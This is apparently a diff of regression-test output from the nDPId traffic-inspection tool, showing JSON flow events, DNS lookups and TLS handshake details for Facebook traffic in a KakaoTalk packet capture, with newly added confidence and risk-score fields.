{"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1430069031017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":138,"pkt_l4_len":102,"ts_msec":1430069031017,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHocCwAANREA2Aq8AQEKGFK8ADVMfgBmmjSqh4GAAAEAAwAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAHADAAFAAEAAAVxAAYDYXBpwBLAMAAFAAEAAAV2AAwEc3RhcgRjMTBywBLAQgABAAEAAAARAAQfDURG"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1430069031167,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":85,"pkt_l4_len":49,"ts_msec":1430069031167,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEUAAEAAQBHSFwoYUrwKvAEBD7EANQAxznCJ\/wEAAAEAAAAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAQ=="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
-01711{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+01027{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
+01817{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1430069031221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":144,"pkt_l4_len":108,"ts_msec":1430069031221,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAIDtrgAANREvLgq8AQEKGFK8ADUPsQBsjjKJ\/4GAAAEAAwAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAA+oABwRzdGFywBfANQAFAAEAAAPqAAwEc3RhcgRjMTBywBfASAABAAEAAAAIAAQfDURU"}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}}
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1430069031230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":87,"pkt_l4_len":51,"ts_msec":1430069031230,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEcAAEAAQBHSFQoYUrwKvAEBOToANQAzWvOyogEAAAEAAAAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAAB"}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="}
 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLtrwAANREvOwq8AQEKGFK8ADU5OgBeI2eyooGAAAEAAQAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAABwAwADAABAAAEYQAfEG1xdHQtc2h2LTE0LWZyYzEIZmFjZWJvb2sDY29tAA=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 